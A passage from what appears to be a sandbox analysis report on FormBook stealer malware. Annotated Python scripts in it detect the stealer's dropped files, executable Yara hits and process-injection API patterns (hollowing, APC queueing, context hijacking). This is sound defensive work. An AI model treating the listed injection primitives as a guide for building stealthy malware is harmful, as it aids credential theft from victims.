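    "Source: Yara match File source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE",
]


def parse_sdmp(name):
    """Decode pid, owning process, base address and protection from a .sdmp id."""
    m = SDMP_RE.fullmatch(name)
    if not m:
        raise ValueError("not a memory-dump identifier: " + name)
    pid = int(m["pid"], 16)
    protect = int(m["protect"], 16)
    return {
        "pid": pid,
        "process": PROCESSES.get(pid, "?"),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "executable": bool(protect & EXECUTE_MASK),
    }


def urls_by_process(lines):
    """Every 'String found in binary or memory' URL, grouped by source process."""
    found = defaultdict(list)
    for line in lines:
        m = STRING_RE.match(line.strip())
        if m and m["url"] not in found[m["proc"]]:
            found[m["proc"]].append(m["url"])
    return dict(found)


def suspicious_urls(lines, noise=("explorer.exe",)):
    """URLs that came from something other than the shell's cached browser data."""
    return {p: u for p, u in urls_by_process(lines).items() if p not in noise}


def executable_yara_hits(lines):
    """Yara matches whose dumped region was executable: code, not leftover data."""
    hits = []
    for line in lines:
        m = YARA_RE.match(line.strip())
        if m:
            info = parse_sdmp(m["dump"])
            if info["executable"]:
                hits.append(info)
    return hits


if __name__ == "__main__":
    for proc, urls in suspicious_urls(SAMPLE_LINES).items():
        print(proc, urls)
    for hit in executable_yara_hits(SAMPLE_LINES):
        print("%s pid=%d base=0x%X %s" % (hit["process"], hit["pid"],
                                          hit["base"], hit["protect"]))
```

On the sample this leaves exactly the two paintpartyblueprint.com strings from control.exe, and reports the 0x7A0000 region in control.exe and the 0x10410000 region in ieinstal.exe as Yara hits in RWX memory; the 0xDE0000 hit is in read-write memory and is dropped. A Yara match for a stealer family inside an RWX region of a Microsoft-signed process is the kind of finding that should be paged on regardless of how the rest of the report reads.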

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogri.ini
          Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogrv.ini
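The two dropped files above share one layout: a directory of eight upper-case alphanumerics directly under %APPDATA%, and files whose name is the first three characters of that directory followed by "log" and an .ini extension (8LO8PUBW\8LOlogri.ini, 8LO8PUBW\8LOlogrv.ini). The following is an added check (not the sandbox's own logic) that encodes that structural rule rather than the literal names, so it also fires on other randomly named stores of the same shape; the sample lines are the two report entries plus two benign paths constructed for contrast.

```python
import re
from pathlib import PureWindowsPath

# "Dropped file: <path>" possibly followed by page residue such as
# "Jump to dropped file"; the non-greedy match stops at the first ".ini".
DROP_RE = re.compile(r"Dropped file:\s*(?P<path>[A-Za-z]:\\\S+?\.ini)")
STORE_DIR_RE = re.compile(r"[A-Z0-9]{8}")

# Constructed sample: the two report entries above (trailing link text
# still attached, as on the page) plus two benign paths made up for contrast.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogri.iniJump to dropped file",
    r"Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\8LOlogrv.iniJump to dropped file",
    r"Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\Microsoft\Windows\settings.ini",
    r"Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\8LO8PUBW\notes.txt",
]


def is_formbook_drop(path):
    """True when a path follows the layout seen in this report:
    %APPDATA%\\<8 upper-case alphanumerics>\\<first 3 of that name>log*.ini
    """
    p = PureWindowsPath(path)
    parts = p.parts
    if len(parts) < 4:
        return False
    appdata, roaming, store = parts[-4], parts[-3], parts[-2]
    if appdata.lower() != "appdata" or roaming.lower() != "roaming":
        return False
    if not STORE_DIR_RE.fullmatch(store):
        return False
    # File prefix is derived from the directory name, so a stray 8-char
    # directory with unrelated .ini files inside does not match.
    return p.name.startswith(store[:3] + "log") and p.suffix.lower() == ".ini"


def formbook_drops(lines):
    """Dropped-file paths in report lines that match the layout above."""
    hits = []
    for line in lines:
        m = DROP_RE.search(line)
        if m and is_formbook_drop(m["path"]):
            hits.append(m["path"])
    return hits


if __name__ == "__main__":
    for path in formbook_drops(SAMPLE_LINES):
        print("FormBook-style drop:", path)
```

The same predicate works against an EDR file-creation feed: the directory name changes per victim, the prefix-derivation rule does not.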
          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D395D0 NtClose,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39540 NtReadFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D396E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D397A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D398F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D399A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D395F0 NtQueryInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39560 NtWriteFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D3AD30 NtSetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39520 NtWaitForSingleObject
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D396D0 NtCreateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39650 NtQueryValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39670 NtQueryInformationProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39610 NtEnumerateValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39FE0 NtCreateMutant
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D3A770 NtOpenThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39770 NtSetInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39760 NtOpenProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D3A710 NtOpenProcessToken
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39730 NtQueryVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D398A0 NtWriteVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D3B040 NtSuspendThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39820 NtEnumerateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D399D0 NtCreateProcessEx
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39950 NtQueueApcThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39A80 NtOpenDirectoryObject
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39A10 NtQuerySection
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D3A3B0 NtGetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D39B00 NtSetValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10429850 NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10429900 NtReadFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10429980 NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10429A30 NtAllocateVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042984A NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_104298FB NtReadFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042997A NtClose
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A295D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29560 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A296E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A296D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29770 NtSetInformationFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A299A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29B00 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A295F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A2AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A297A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A2A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A2A770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A298A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A298F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A2B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A299D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A29A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04A2A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B9850 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B9900 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B9980 NtClose
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B9A30 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B984A NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B98FB NtReadFile
          Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_007B997A NtClose
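The native-API listing above is the evidence behind the injection signatures in the summary (process hollowing, APC queueing, thread-context modification, section mapping): each is a small set of Nt* calls that only makes sense together. Two further things stand out when the lines are read side by side: the same functions appear in both ieinstal.exe and control.exe at addresses that differ only in their upper bits (4_2_04D395D0 vs 14_2_04A295D0, 4_2_04D39950 vs 14_2_04A29950), and every stub is paired with LdrInitializeThunk, consistent with one payload that carries its own syscall stubs being mapped at a different base in each process. The following is an added example (not part of the report) that parses the `Code function:` lines, maps the API names found per process onto those technique sets, and lists the APIs whose stubs sit at the same offset within the 64 KiB allocation granularity in both processes. The technique-to-API sets are my own reading of common injection primitives, not something the report defines; the sample is a subset of the lines above.

```python
import re
from collections import defaultdict

# "Source: <image> Code function: <pid>_<run>_<addr> Api1,Api2,...<trailing id>"
# The image path may contain spaces and the page may fuse ".exeCode".
CODE_FN_RE = re.compile(
    r"^Source:\s*(?P<image>[A-Za-z]:\\.+?\.exe)\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+(?P<apis>\w+(?:,\w+)*)"
)
FN_ID_RE = re.compile(r"\d+_\d+_[0-9A-Fa-f]+")   # the repeated trailing id column

# Native-API sets that, taken together, implement one injection primitive
# (assumed groupings, matching the signature names in the report summary).
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "thread context hijacking": {"NtSuspendThread", "NtGetContextThread",
                                 "NtSetContextThread", "NtResumeThread"},
}

# Constructed sample: a subset of the report lines above, not live output.
IE = r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: "
CT = r"Source: C:\Windows\SysWOW64\control.exe Code function: "
SAMPLE_LINES = [
    IE + "4_2_04D395D0 NtClose,LdrInitializeThunk,4_2_04D395D0",
    IE + "4_2_04D39780 NtMapViewOfSection,LdrInitializeThunk,4_2_04D39780",
    IE + "4_2_04D397A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04D397A0",
    IE + "4_2_04D399A0 NtCreateSection,LdrInitializeThunk,4_2_04D399A0",
    IE + "4_2_04D39A20 NtResumeThread,LdrInitializeThunk,4_2_04D39A20",
    IE + "4_2_04D3AD30 NtSetContextThread,4_2_04D3AD30",
    IE + "4_2_04D398A0 NtWriteVirtualMemory,4_2_04D398A0",
    IE + "4_2_04D3B040 NtSuspendThread,4_2_04D3B040",
    IE + "4_2_04D39950 NtQueueApcThread,4_2_04D39950",
    IE + "4_2_04D3A3B0 NtGetContextThread,4_2_04D3A3B0",
    IE + "4_2_10429980 NtClose,4_2_10429980",
    IE + "4_2_04DB44964_2_04DB4496",             # no API names: skipped
    CT + "14_2_04A295D0 NtClose,LdrInitializeThunk,14_2_04A295D0",
    CT + "14_2_04A2AD30 NtSetContextThread,14_2_04A2AD30",
    CT + "14_2_04A297A0 NtUnmapViewOfSection,14_2_04A297A0",
    CT + "14_2_04A298A0 NtWriteVirtualMemory,14_2_04A298A0",
    CT + "14_2_04A29950 NtQueueApcThread,14_2_04A29950",
    CT + "14_2_04A29A20 NtResumeThread,14_2_04A29A20",
]


def api_calls(lines):
    """{image name: {api name: [function addresses that reference it]}}."""
    calls = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = CODE_FN_RE.match(line.strip())
        if not m:
            continue
        image = m["image"].rsplit("\\", 1)[-1]
        for api in m["apis"].split(","):
            if api and not FN_ID_RE.fullmatch(api):
                calls[image][api].append(int(m["addr"], 16))
    return {image: dict(apis) for image, apis in calls.items()}


def injection_techniques(apis):
    """Technique names whose complete API set is present."""
    present = set(apis)
    return sorted(name for name, need in TECHNIQUES.items() if need <= present)


def shared_offsets(calls, a, b, mask=0xFFFF):
    """APIs referenced at the same offset (mod 64 KiB) in both processes:
    the same code mapped at different bases."""
    shared = []
    for api in sorted(set(calls.get(a, {})) & set(calls.get(b, {}))):
        offsets_b = {addr & mask for addr in calls[b][api]}
        if any(addr & mask in offsets_b for addr in calls[a][api]):
            shared.append(api)
    return shared


if __name__ == "__main__":
    calls = api_calls(SAMPLE_LINES)
    for image, apis in calls.items():
        print(image, injection_techniques(apis))
    print("shared stubs:", shared_offsets(calls, "ieinstal.exe", "control.exe"))
```

On the sample, ieinstal.exe satisfies all four sets and control.exe the hollowing and APC sets (the subset omits its NtCreateSection, NtSuspendThread and NtGetContextThread lines, which the full listing does contain), and every API present in both processes is found at a matching offset.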
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DB4496
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1B477
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DBD466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D0841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC25DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D0D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D22581
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DB2D82
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D265A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC1D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC2D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04CF0D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC2EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DA1EB6
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DBD616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D15600
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D16E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DCDFCE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC1FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC28EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D0B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D220A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC20A8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DB1002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1A830
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DCE824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D199BF
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04CFF900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D14120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DB4AEF
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC22AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1B236
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DAFA2B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DB03DA
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DBDBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D2ABD8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DA23E3
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1EB9A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D2138B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D2EBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1AB40
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D9CB4F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04D1A309
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_04DC2B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042CA46
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042DA5E
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042D29D
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042CB3E
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042D4B3
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042DFE6
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_1042D7F9
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10419F80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4_2_10412FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA449614_2_04AA4496
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049F841F14_2_049F841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AAD46614_2_04AAD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0B47714_2_04A0B477
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A165A014_2_04A165A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A1258114_2_04A12581
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA2D8214_2_04AA2D82
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB25DD14_2_04AB25DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049FD5E014_2_049FD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2D0714_2_04AB2D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049E0D2014_2_049E0D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB1D5514_2_04AB1D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A91EB614_2_04A91EB6
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB2EF714_2_04AB2EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A06E3014_2_04A06E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0560014_2_04A05600
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AAD61614_2_04AAD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB1FF114_2_04AB1FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04ABDFCE14_2_04ABDFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A120A014_2_04A120A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB20A814_2_04AB20A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_049FB09014_2_049FB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AB28EC14_2_04AB28EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04ABE82414_2_04ABE824
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0A83014_2_04A0A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04AA100214_2_04AA1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A099BF14_2_04A099BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04A0412014_2_04A04120
